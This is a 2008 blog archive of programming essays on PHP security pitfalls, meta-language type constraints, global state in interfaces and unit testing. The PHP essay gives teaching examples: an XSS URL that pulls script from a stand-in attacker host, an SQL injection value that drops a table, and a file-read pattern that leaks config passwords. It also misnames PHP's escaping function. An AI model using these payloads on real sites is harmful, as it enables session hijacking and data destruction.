Monthly Archive for October, 2008

More is Worse

Countless stories and folk tales relate the story of a man who sought or otherwise found boundless power, which proved too much to handle and ultimately destroyed him. Yet, what brought most of us to programming is the unmistakable feeling of omnipotence, the ability to make the machine do anything one desires provided that one can explain how to do it.

And, inevitably, the bitter taste of experience teaches us that omnipotence is the greatest curse that has ever befallen the computer programmer or the system administrator, leaving us to face the new generation of programmers who delight in the latest programming language version of the swiss army knife, favoring expressiveness over safety and security.

Much to my delight, PHP has been a historical breeding ground for such low-safety, low-security, low-verbosity solutions.

Automatic global variables

Perhaps the oldest and most delicate security issue in PHP was the automatic registration of request arguments as global variables. Consider the simple PHP script that displays a countdown in bold and italics:

assert (is_int($count)); 

while ($count > 0) 
  $result .= string($count--) . ", "; 

$result .= "Fire!"; 

echo '<p>In bold: <b>'.$result.'</b>.</p>';
echo '<p>In italics: <i>'.$result.'</i>.</p>';

This snippet uses two common productivity-enhancing features of the earlier PHP incarnations: the fact that variables could be used without being initialized (so $result is initially null, implicitly converted to the empty string, and then used) and the automatic registration of variables, allowing $count to equal what is now known as $_REQUEST['count'] (which could be provided, for instance, by accessing http://example.com/script.php?count=3).

Obviously, this creates huge vulnerabilities. For instance, a short piece of code such as the one above could very well contain an XSS (cross-site scripting) vulnerability! It’s enough for an attacker to find out that the script uses a variable named $result (fairly easy with open source software) and provide an initial value for it, for instance injecting some javascript on another page. The victim would be vulnerable when following an URL such as:

http://example.com/script.php?count=0&result=<script src=http://haxor.com/hax.js></script>

Now that the attacker has injected arbitrary JS in thevictim’s browser on the page that is being attacked, he can do anything as if he were the victim, using the victim’s session on the target site.

Needless to say, PHP has already restricted the use of automatic global registration to contain this evil.

SQL Queries

Yet another high-productivity improvement in PHP is its tight connection with the MySQL database management system. In the good old days when “real programmers” had to update an account balance in a database, they would write a stored SQL procedure which received the account balance as an argument and performed the correct manipulation, then they would write some web server code that connected to the database and called that stored procedure.

PHP allows its users to brutally shorten the amount of work necessary for that:

function update_balance($id, $amount)
{
  mysql_connect();
  mysql_query(
    "UPDATE accounts " .
    "SET balance = balance + $amount " .
    "WHERE id = $id");
}

This code works by generating an SQL query as a string, then sending that query over the connection to the MySQL database manager, which runs it as-is. This code contains a classic SQL injection vulnerability, where the attacker provides values of the $id or $amount variables that generate malicious SQL code. For instance, providing $amount = “0; DROP TABLE accounts; –” and $id = 0 results in the generated (and executed) SQL statements:

UPDATE accounts SET balance = balance + 0;
DROP TABLE accounts;
-- WHERE id = 0

Of course, this assumes that there are no other safety rules that filter out invalid values for $amount or $id (which must be integers). But when the data being stored is a bit of text, which should be stored as-is regardless of what it contains, the safety checks disappear and the vulnerability becomes apparent (and often exploited, sometimes in the least expected ways).

There are certainly workaround for this, the first of them being the existence of mysql_real_escape_query, which eliminates any risk of injection, provided that it is used, and it’s easy to forget using it (not to mention the overhead of using it). Many frameworks provide their own version of a query generator that automatically escapes query arguments. My own mini-framework involves:

$link = mysql_connect();
qprintf(
  $link, 
  "UPDATE accounts "
  . "SET balance = balance + {0} "
  . "WHERE id = {1}", 
  $amount, $id);

And the Zend Framework involves:

$select = $this 
  -> select()
  -> where('id = ?', $id); 

$row  = $this -> fetchRow($select);
$data = array('balance' => $row -> balance + $amount); 

$where = $this 
  -> getAdapter()
  -> quoteInto('id = ?', $id); 

$this 
  -> update($array, $where);

To account for the unsafety of the short version, more code has to be added.

Remote file access

In the beginning, accessing a remove file (for instance, at the other end of an http:// address) in PHP was a difficult task that involved manually connecting to the server to fetch the file (using cURL, for instance).

Then, the elementary file-opening function fopen gained the ability to open remote files with several protocols (and the possibility to add more).  Suddently, the old fifteen-line routine for reading the contents of an RSS feed became as simple as readfile(“http://example.com/rss.php”), and there was much rejoicing.

One thing led to another, and code using that feature began to multiply using patterns such as these:

function display_quoted($url)
{
  print '<blockquote>';
  @readfile($url);
  print '</blockquote>';
}

Except that, while readfile documented that it could open both local and remote files, display_quoted only documents that it can open remote files. And when a local path is passed to display_quoted, well, you’ve just output config.inc.php and the database passwords that were hidden in there.

The solution, of course, is to distinctly separate functions which operate on local files from functions which operate on remote files. It’s certainly possible to keep on using readfile to perform remote access, but additional checks should be made to guarantee that it’s performing remote access and note local access.

(Meta) language, Part 2

Part one can be found here, and I strongly suggest reading it first. Among the modifications that will be encountered here, the most important is that modules are now called objects, to improve readability.

This part discusses using names as first-class elements, and the underlying type system.

Names as half-class citizens

In the vast majority of statically typed languages and compiled languages, names cannot be manipulated. By contrast, most dynamic languages handle names. After all, the very notion of anonymous function, in PHP, is handled by giving the function a name at runtime and then passing that name around. It’s perfectly sensible to write the code below, and its result will be the expected one.

function square($x) { return $x * $x; }
$func = 'square';
print $func(10);

The PHP language restricts this feature to a few areas: when calling a function ($name(args) syntax), accessing a member ($obj -> $name syntax), creating a class (new $name(args) syntax) and accessing a variable ($$name syntax). Other examples, such as function $name(args) {} definitions, are not supported (though they can be achieved using other reflection or evaluation features).

In practice, knowing the name of an existing object is not useful: pointers, references, closures, factories and member pointers are all superior alternatives to names when referencing an existing object.

Of course, this does not solve the issue of defining new objects by name.

The need

First, the considered meta-language provides the use-pattern construct, which applies a pattern to an object. A pattern is allowed to define new members in that object. Depending on the situation, it may or may not be useful to let the new members hide the existing members. Consider for instance a pattern that adds access verification to a function. The result would be that the function is now only callable with an additional key argument that allows identity checking for access verification. The pattern must therefore know the name of the function that must be hidden.

Example source code:

pattern AddAccessVerification name valid =
  exception AccessNotAllowed
  def (name) =
  { token ->
    if ! (valid token) then throw AccessNotAllowed ;
    $.(name)
  }
end-pattern

This example hides the member function with the provided name by requiring an additional argument. If the original function was called as $.func a b c, it is now called as $.func token a b c.

A second need is the ability to store arbitrary labels as part of objects without conflicting with existing labels. For instance, if one needs to add an URL value to an entity, then one needs to also redefine the new built-in function for that entity to also take into account the URL. To avoid having to propagate a new argument, the argument to that built-in function is an object with a predefined set of labels. The URL-adding pattern must therefore create a new label for that object:

object Page =
  entity page
  property content[page] : string
  def new(page) =
  { data ->
    new $.page (object) | $.content[_] <- data.content
  }
end-object 

pattern WithUrl ent label =
  property url[$.(ent)] : string
  def new((ent)) =
  { data ->
    new $.(ent) (data hide (label)) | $.content[_] <- data.(label)
  }
end-pattern 

object UrlPage extends Page =
  use-pattern WithUrl `page` `my_url`
  def createPage =
  { text url ->
    new $.page {{ content = text ; my_url = url }}
  }
end-object

The solution

As illustrated above, names are subject to two rules:

  • A symbol quoted with backticks becomes a name. For instance, `page` is the name page. Such a name can be manipulated as any other variable. Its type is merely ‘name‘.
  • A name variable can be used wherever a member name could be used : def name = … , … hide name, new(name) …, property name = …, … entity name, pattern name = …, object name = …, value.name, {{ name = value ; … }} and so on. It must be escaped with brackets. So, for instance, def xyzzy = { 10 } is equivalent to def (`xyzzy`) = { 10 }.

The main difficulty here is working with a type system that can withstand these issues correctly. In particular, consider code such as this:

object Problematic =
  entity url
  use-pattern WithUrl `url` `url`
end-object

Without any checks, this would attempt to apply pattern WithUrl, which adds a new member named url (thereby hiding the old url member), then attempts to access the member named url as if it were an entity (because that was the provided name for the wrapped entity). Therefore, this must be caught by the type system (otherwise, the language risks the same dangers as the C++ metaprogramming features : you don’t know if you’re wrong until you try it).

The proposed type system is constraint-based. It works by associating an atom to every expression, and then expresses a set of constraints on the atoms found within a definition (such as a function, pattern or object). These constraints are verified when the atoms already exist, but when some of the atoms are parameters, the constraints are instead kept and inserted into the constraint system of the location which provides those parameters.

So, the constraint set for the WithUrl pattern would look like this:

WithUrl : (ent:name) -> (label:name) -> ($:object) -> (result:object)
with 
| $.(ent) : entity 
  obj2 = $ def url
| obj2.url : property[$.(ent) -> string]
| obj2.(ent) : entity
  result = obj2 def new((ent)) 
| new result.(ent) : (data:object) -> instanceof(result.(ent))
  with 
  | data.(label) : string
  | new obj2.(ent) (data hide label) : instanceof(result.(ent))

And so, providing `url` as ent would result in the conflicting constaints that:

WithUrl : url -> name -> (obj:object) -> object
with 
  obj2 = obj def url
| obj2.url : property[obj.url -> string]
| obj2.url : entity

Readability issues

This constraint model is much less readable than the typical ML type, and is in fact getting much closer to the C type system (which works by describing the operations that can be applied to variables). There should be no surprise that such a type system must be complex in order to account for meta-programming. But what does the type system look like when working with non-meta code?

The constraint set for the resulting UrlPage is this:

UrlPage : object
with 
| $.page : entity
| $.content : property[$.page -> string]
| $.url : property[$.page -> string]
| new $.page : (data:object) -> instance-of($.page)
  with 
  | data.text : string
  | data.url : string

This is much more readable. Is this because of the absence of pattern, or because of the absence of names? Forgetting for a short while about names, let’s rewrite the WithUrl pattern:

pattern WithUrl =
  property url[t] : string
  def new(t) =
  { data -> new $.t (data hide url) | $.content[_] <- data.url }
end-pattern 

The constraint system for this pattern is:

WithUrl : ($:object) -> (result:object)
with
| $.t : entity
  result = $ def url def new(t)
| result.url : property[result.t -> string]
| new result.t : (data:object) -> instance-of(result.t)
  with
  | data.url : string
  | new $.t (data hide url) : instance-of(result.t)

While slightly more complex, this remains quite manageable when considering the complexity of patterns. Equivalent systems are either too lax (C++ templates), too restrictive (C# generics) or just as verbose (Objective Caml functors).

Introducing Name Constraints

The simple solution would be to add name equality constraints. That is, if ent was known not to equal `url` or any of the names used internally by the pattern, then the constraint system would be much simpler. For instance:

pattern WithUrl ent label =
  assert { ent <> `url` }
  property url[$.(ent)] : string
  def new((ent)) =
  { data ->
    new $.(ent) (data hide (label)) | $.content[_] <- data.(label)
  }
end-pattern 

The assertion protects the following definition of url of overwriting $.ent, thereby allowing a more compact constraint set:

WithUrl : (ent:name) -> (label:name) -> ($:object) -> (result:object)
with
| assert { ent <> `url`}
| $.(ent) : entity
  result = $ def url def new((ent))
| result.url : property[result.(ent) -> string]
| new result.(ent) : (data:object) -> instance-of(result.(ent))
  with
  | data.(label) : string
  | new $.(ent) (data hide (label)) : instance-of(result.(ent))

To be continued

This overview still does not have a concrete description of the actual constraint-solving algorithm (though the actual constraints can be trivially extracted from the expressions, they still need to be grouped, solved and verified). Another possible point of contention is the new-operator, which can be overloaded and thus may cause issues because it is not bound to an object but rather to an entity. A possibility is to remove the possibility to overload it altogether, and instead only allow it to be hidden.

Time is a Global Variable

Software Interfaces

The interface of a tool, program or piece of code is a complete description of how it may be used without tinkering with its implementation. They would be the complete, ideal and perfect user manual and documentation if such a thing existed.

For instance, consider the following function:

int add_one(int i) { return i + 1; }

This function is passed an integer, and returns that integer plus one.

Some languages provide an explicit means of describing interfaces. Java, PHP and C# provide interfaces, which describe the list of functions that objects implementing that interface will have and how they should behave. For instance, in Java:

// Represents a finite or infinite sequence of objects. 
// Initial state: no current object.
// Iteration state: there is a current object.
// Final state: there are no more objects.
interface IEnumerator
{
  // - If in initial state, moves to iteration state with
  // the first object as current object, or directly to
  // final state if the sequence is empty.
  // - If in iteration state, if an object exists after
  // the current object, then that object becomes
  // current, otherwise moves to final state.
  // - If in final state, remain in final state.
  // Returns : true if ends in iteration state, false if in final state.
  boolean Next(); 

  // - If in iteration state, returns the current object.
  // - In any other state, throw NoValueException
  Object Value();
}

Alternative representation, but much shorter:

// Represents a numbered sequence of N elements, 
// with numbers from 0 to N-1.
interface ISequence
{
  // Returns the number N of elements.
  int size(); 

  // Returns the element of the sequence with index i.
  // Throws InvalidIndexException if i is not between 0 and N-1.
  Object at(int i);
}

An interface exists whether or not it’s documented, but it is of course better for the users if the documentation exists.

Keep interfaces simple

Writing complete documentations is not simple in the average case, because one has to take into account all the possible ways in which the documented object may be used, and it’s easy to forget a corner case which someone, someday, will have to tackle.

Making interfaces as simple as possible helps both describing those interfaces (since there is less to write and think about) and using them (because there’s less to read and less to understand). Common techniques for describing interfaces include:

  • Avoid state. State-less behavior is the simplest to model, because it involves only input, output and the relationship between them. This is one of the major selling points of referential transparency:
(** Returns the sum of the elements, 0 if empty. *)
val sum : int list -> int
  • Avoid mutable state. Describing state involves both describing how the various elements of that state are related with each other, and how the state changes in response to certain actions. If the state does not change, then there is that much less information to explain and understand.
  • Avoid multiple states. Not only does every additional state require a complete description of its inherent properties, it also requires handling the interaction between that state and every function and method which operates. If your code involves special cases that need to be handled separately, try to design the code so that those special cases are just examples of the more general case. In the above example, ISequence (one state) is much simpler to describe that IEnumerator (three states).
  • Describe multiple states separately and distinctly. Always make it clear and explicit what states an object may be in, and list the behavior by explicitly naming the states in the documentation of each method and function. Give each state a short, simple and understandable name, using the classic buzzwords initial (the state that the object is in when it’s first created), final (a state from which no other state may be reached), locked (a state which prevents additional operations, is usually the consequence of a lock action and may be ended with an unlock action) and error (a state which is the result of an invalid operation and requires correction to return to a normal state).
  • Separate state into almost independent sub-states. While fully independent sub-states usually illustrate a design issue (each independent sub-state should be moved to its own function or class) it often makes things easier to mention that the state is comprised of substates that are mostly independent, except for a few cases. For instance, the capacity of an std::vector is mostly independent of its other operations (the only dependence is that the capacity will always be greater than the size, and will thus be adjusted accordingly) and so it does not require mentioning on every single operation (and especially not those which do not increase the size).
  • Use idioms. In C++, labeling an object as an iterator, or creating functions begin() and end() which return an iterator with a specific value_type, immediately brings up a lot of information about the fact that these functions iterate through a sequence with a known mechanic. This eliminates the need for explaining the mechanic again from scratch.
class random_sequence
{
public:
  // Create a sequence of 'size' random uniform integers in
  // the interval [valmin,valmax), with valmin < valmax.
  random_sequence(unsigned size, int valmin, int valmax);
  unsigned size() const;
  typedef detail::randseq_iterator iterator;
  iterator begin() const;
  iterator end() const;
};
  • Use domain vocabulary. There are some chances that, while unfamiliar with your code, the reader is familiar with the domain model. For instance, a hotel room is a concept known to the average programmer, and it can be easily understood that a room has a number, and can be either available or unavailable. This makes the following interface self-explanatory:
interface IHotelRoom
{
  int room_number();
  boolean available();
}
  • Reuse patterns. If your code needs to do things in an unusual way, then find a common way of doing things and reuse that approach as much as possible (without, of course, shoehorning a round peg in a square hole). This reduces the number of different patterns that the user has to understand when using your code.

Unreliable Behavior

A very interesting explanation of this law was done by Joel Spolsky in this article. The gist of it is that you can’t win the Good Interface battle, and that no matter how hard you fight to turn every one of your abstractions into a pure core of cleanly abstracted and elegant functionality that could be expressed in a single sentence, the implementation details that ought to be hidden will imperceptibly ooze out from the pores of your abstraction and bite the users of that interface when they least expect it.

Let’s look at our first example again:

int add_one(int i) { return i + 1; }

This function is supposed to add one to its argument. What happens when one calls add_one(MAX_INT)? Certainly not returning an integer that represents the expected value, but more likely something along the lines of MIN_INT.The interface of the function relied on the abstraction that int represents all integers, but the fact that int represents only a subset of all integers will ooze out as predicted when one hits the limit of the abstraction.

While such leaks cannot be eliminated, they should be reduced as much as possible. This is done either by identifying and mentioning them in the interface (an arduous process, but one that can provide a nice pay-off when done correctly), or by altering the interface so that it flows with the underlying abstraction rather than trying to wrap around its corners and hard edges. Stone sculptors already know this quite well: follow the grain of the stone rather than fight against it.

A classic example is that of treating remote access as local access. The main differences between local access and remote access are that local access is fast and reliable, while remote access is slow and unreliable. The slow and unreliable parts cannot be hidden away by the interface of your code as long as that remote access is necessary to the functionality. Your program should be able to anticipate when the user unplugs the cable or replaces it with an IPoAC scheme, and intelligently react to these situations—whether that happens by aborting with a flashy error message, or by falling back to an offline or slow-connection mode with a little informational tag about what happened.

The gist of the bittorrent system, on the user side, is that you have a file which floats around on the web, shared among many people from which you can get it simultaneously. You can even provide it to others before the download is complete, because you already have some bits of it. All you need is, of course, to be connected to the internet.

On the technical side of things, the bittorrent protocol involves a large deal of communication that has some interaction issues with routers: though a person may have a perfectly working internet connection (allowing them to send and receive mail, visit web sites and chat on instant messaging programs), their computer may not be accessible from the internet. This is because a router (which acts as a bridge between a local network and the internet in this case) will connect a port on the local network side to a port on the internet side, at the request of a computer on the local network side. The result being that servers that you contact can answer back, but servers that want to contact you will be stopped by the router. And so, if two people who want to share a torrent are both behind routers, neither will be able to connect to the other to send the file. Too bad. Yes, a router can be configured to work around this issue, but that is not the point.

The end result being that someone behind a router will not be able to receive files from anyone else behind a router, greatly reducing the download speed. Yet, this is not something as obvious as getting a download rate of zero because no internet connection is found.

Some bittorrent clients silently ignore the absence of incoming connections, their interface is therefore puzzling to users because the consequence is present but the cause is not diagnosed. Other clients, such as µTorrent, clearly indicate the issue and propose solutions.

This brings up a point which goes largely unnoticed in language design: a function may either return a value, or give up and tell its caller than the value could not be computed by throwing. There’s no way for a function to tell its caller a simple “this may take a while, you may want to try something else, or notify the user” without interrupting the computation. The end result is that the people who write software have to work around this limitation with asynchronous worker threads and notifications. More about this in a later article.

Global dependencies

Time is a global variable: every point in your program will be executed at a given point in time. Of course, it’s not necessarily easy to evaluate what that time is (even the best time functions can only be so accurate) nor can one always make assumptions about whether two distinct operation will be evaluated at distinct times or even in a certain sequence, simply because of multithreading. Similarly, the network connection of your computer is a global variable: unless you’re working at a very low level, your code will not be manipulating the wireless antenna or RJ-45 wire, and instead the network communication primitives that your code uses will be bound by the operating system drivers to the appropriate hardware without your code ever noticing it. In general, everything that is not part of your code is a global variable to your program. It’s part of that big ball of global state that’s called the real world.

And, just like any other kind of global state, these external factors wreak havoc on the interface of every bit of code that ever uses them.

The problem with any kind of global state is that the interaction of a function or object with a piece global state cannot be hidden. Consider the typical example of:

int i = 0;
int next() { return i++; }

This function references global state. This means that to explain the interface of the function, one must also mention the existence and nature of the global variable to which it is associated. In this example, the interface is reasonably simple: increment the value of the global variable, and return the old value.

When you have a global variable (or any piece of global state, such as a monostate, singleton, external resource, and so on), ask yourself these two simple questions for every function in your codebase:

  1. Does this piece of code alter, under any circumstances, that global state?
  2. Does the code behave in the same way regardless of the value of that global state?

If you answered ‘yes’ to either question, then that piece of code depends on the global state. Make sure that you mention that in the documentation, with the complete details of how the global state affects the behavior of your code. Simple continuous read-only global behavior (returns the size of the global array, for instance) is good, while complex non-continuous read-write global behavior tends to eat up so much documentation space that you might want to consider refactoring.

Of course, if you answered “I don’t know” to either question, then you have a much tougher problem on your hands: you have absolutely no idea how manipulating that global variable (adding code that changes it, or removing code that changes it) could break that code, nor do you have any idea about how removing or changing that code could break anything else in the program that relies on that global variable. That code is a Lava Flow subject to potential Action at a Distance.

But back to the actual situation where you know every piece global state that a given piece of the program must access. Of course, writing down a list of dependencies for every function and every global variable is going to end up with a quadratic amount of documentation and the corresponding difficulties for keeping up to date. Never mind the difficulty of using the compiler to statically check that it’s correct!

Procedural Style Singleton-Jutsu

The main problem with global state today is that vanilla object-oriented programming is downright lousy as far as handling global state goes. For reuse purposes, your average object will expect to receive the context as an argument instead of accessing it globally (otherwise, to test or reuse the object, you’d have to replicate the entire context without changing a piece). While one can coax the object-oriented tools that are classes and objects into representing and handling global state appropriately, this usually eliminates most of the benefits of object-oriented programming (being able to replace an object with another, and to customize the behavior of an object through its parameters) while keeping the expressiveness drawback of having to uphold the class/instance duality. Yes, Mr. Singleton, I’m looking at you.

Procedural-style programming, on the other hand, handles global state well. This is to be expected, after all global state was what procedural programmers relied on for their everyday code, so it should be no surprise that after a while patterns tend to emerge to handle it without too much pain. In a typical large-scale procedural application, state is encapsulated in modules and subsystems. These would pretty much amount to the singleton pattern, except that they don’t have to define a class/instance separation like singletons do, and as a consequence they are shorter.

So, why do subsystems and modules handle global state well? You have 1000 procedures in your code, and 100 pieces of global state: handling all these pieces leads to 1000×100 = 100000 possible references between procedures and code. There is no way to handle this through documentation without a way to eliminate most references early on in an obvious way. This is what procedural style achieves well.

  • They encapsulate global state with a low granularity. Encapsulation in general is a no-brainer, but the catch is that these things have a low granularity. Instead of blowing up a functionality block to smithereens resulting in large hierarchies of classes and helper classes and auxiliary classes, systems tend to grow much fatter than average objects, and every function is cleanly tied to a system. This makes it much easier to describe one part of the dependency: a function always depends on the global state of its system. This is actually the entire point, after all. So, now our 100 pieces of global state are grouped together in exactly 10 modules with 100 procedures each. There are still 1000 procedures floating around, but now you’ve divided the maximum number of references by 10, down to 10000.
  • They encapsulate global state references with low granularity. Now this is the real winner. Since procedures are grouped in modules as well, the procedural programmer can decide that all procedures in a module have the same global dependencies (usually by asserting that the state of the module, which is the only thing that procedures care about, has a dependency on the state of another module). So, now you have only 10 modules, and you only have to care about the 45 possible dependencies between these. This can be done with a piece of paper or, even better, by generating a dependency graph with your compiler or build tools.

Object-Oriented Programming does not share these goals. Where procedural programming has evolved to help humans manage relationships between wads of pieces of global state, object-oriented programming set out from the very first moment to help humans manage the factoring of shared functionality and the reuse of existing code. Again, no surprise here : OO was never meant to rock your panties at global-state-handling.

In order to improve reusability, object-oriented designs tend to apply the Single Responsibility Principle by creating one object per unit of responsibility (so that one can always use one functionality without having to bring several others along). This means that your average object-oriented program would have an order of magnitude more classes than the equivalent procedural program would have modules. This decreased granularity, linked to the fact that global state exists at the class level instead of the module level, makes it much harder to track which class is using the global state provided by which class (not to mention that quite often the tools just aren’t able to trace a dependency graph for global state). Worse, since all the classes were designed to be used in isolation, every one of them must have a quick documentation effort about the relationship between that class and all the global state. So did modules, but modules were fewer.

The consequence is that if a program has to contain a lot of global state, resorting to procedural programming will reduce the reusability of code, but will increase productivity on the long term as the global state does not seep through a low-granularity design as much as it does through a high-granularity design. Conversely, avoiding global state as much as possible improves the productivity of object-oriented development, because it allows better reuse of common functionality.

Unit Testing

Once upon a time, software was tested by people who used the programs down to every bit of functionality and sent a memo to the developers when they noticed something was amiss. This method usually detected the most obvious bugs in the program (assuming, of course, the testers were competent at exploring the entire feature set) and allowed the developers to correct them before shipping.

This method involved two main issues.

  1. The first issue was that it was slow : when a programmer changed a few lines of code in a single file, he couldn’t just ask for a complete test of the entire application. Although he could perform a cursory test himself, he had to go on without the certainty that his modifications broke the application in a subtle way that only thorough testing could detect.
  2. The second issue was that there was no granularity. When a tester found a bug, that bug was always discovered through the application’s user interface, and the developers had to backtrack from there to the entire application code behind that bit of interface to find the origin of the bug. There was no way for a tester to identify the function where a bug appeared.

Automatic Unit Testing solves both issues. An automatic unit test is a piece of code which will automatically perform a test on a small piece of program functionality called an unit. The result is that developers can run entire suites of unit tests with the press of a button as soon as they finish writing or changing code, and that the test clearly identifies which unit provided incorrect results and thus greatly reduces the search perimeter for the bug.

A simple example

Your program uses a function which removes all duplicates from a sorted array of integers. The function is written as such:

function uniques($array) 
{
  foreach($array as $value)
  {
    if ($value != $last) 
      $result[] = $value;
    $last = $value;
  } 

  return $result;
}

The astute and experienced reader will have noticed by now several bugs in this implementation, but mostly this looks like the typical PHP function an average developer would write at 6PM a few minutes before leaving work, and it works on most input.

Tests for this function (which I provide here without a unit testing framework for the sake of simplicity, though I do encourage using one) would be as follows:

function test_uniques_empty() 
{ assert (uniques(array()) === array()); } 

function test_uniques_just_one()
{ assert (uniques(array(0,0,0)) === array(0)); } 

function test_uniques_distinct()
{ assert (uniques(array(1,2,3)) === array(1,2,3)); }

These tests describe example situations where the function could be used, with the arguments, and checks that the return value for the function is indeed what is expected. Should the return value not be what the developer wants it to be, the test will display an assertion failure.

The tests are run, and both test_uniques_empty and test_uniques_just_one will fail.The developer determines that the first call to uniques() returned null (not surprising, since $result is only initialized if the array contains elements) and uniques(array(0,0,0)) returns an empty array (again, not very surprising since $value != $last tests false when $value is zero and $last is uninitialized).

This leads to a corrected version of the function, which now passes all tests:

function uniques($array) 
{
  $last = 0;
  $result = array();
  foreach($array as $value)
  {
    if ($value != $last) 
      $result[] = $value;
    $last = $value;
  } 

  return $result;
}

Should the developer need to alter the function (for instance, to use a standard library function or to perform checks on the arguments) the unit tests can be run again to determine that the original behavior of the function was retained after the modifications.

Test First

Testing can only show the existence of errors, not prove that a program is correct, but the better the tests and the higher the probability that any important bugs are weeded out, leaving only those that appear in very complex conditions.

Of course, this assumes that the tests are, themselves, correct. While a human tester can use his common sense or experience to perform meaningful tests, an automatic unit test can only do what it was told to do. Consider for instance the following function:

function square($x) { return $y * $y; } 

function test_square() 
{ 
  $result = square(4);
  assert ($result = 16);
}

Blind reliance on unit testing in the above case results in wasted time and hairs being pulled out. The test passes, so the function must work. The issue is, of course, that both the test and the function are wrong. The problem : the only value of a test is that it can fail. As such, every test that is written must somehow prove that it can fail in some situations, which of course for the function above is not a possibility.

The solution : write the tests before the code that is being tested, then run them. If they don’t fail (as they should), then they aren’t any good. In the above example, if the non-implemented version of square is made to return -1, then any test for that function should fail.

function square($x) { return -1; } 

function test_square() 
{ 
  $result = square(4);
  assert ($result = 16);
}

Since the test above doesn’t fail, it would then be examined to determine why, and corrected, leading to the correct version of the test. Then, once the square function is implemented, the test will fail again (indicating that an error is present), leading to the correct version of the function and the complete code:

function square($x) { return $x * $x; } 

function test_square() 
{ assert (square(4) === 16); }

This is the test first philosophy : whenever a new piece of functionality has to be written, a test should be written first to demonstrate that the functionality has been written correctly, and the developer should check that the test fails if the functionality has not been written first.

Test-Driven Design

Test-driven design pushes the logic of Test First even further : since when using a Test First process the functionality is not implemented until the tests are done, it’s possible to use the tests to evaluate the design of the code. As such, if the design makes the functionality difficult to use within a unit test, then it can be reasonably assumed that the design will also be difficult to use in a general situation. Of course, it may be extremely well adapter to a niche usage within the system, but reusing that code outside the niche will then prove just as difficult as it was when writing the tests.

As such, Test-Driven Design consists in starting with an elementary design, writing a unit test for that design, and then reworking the design based on the usage done in the unit tests so that the functionality is as easy to use as possible.



1170 feed subscribers
(readers who polled a feed this week)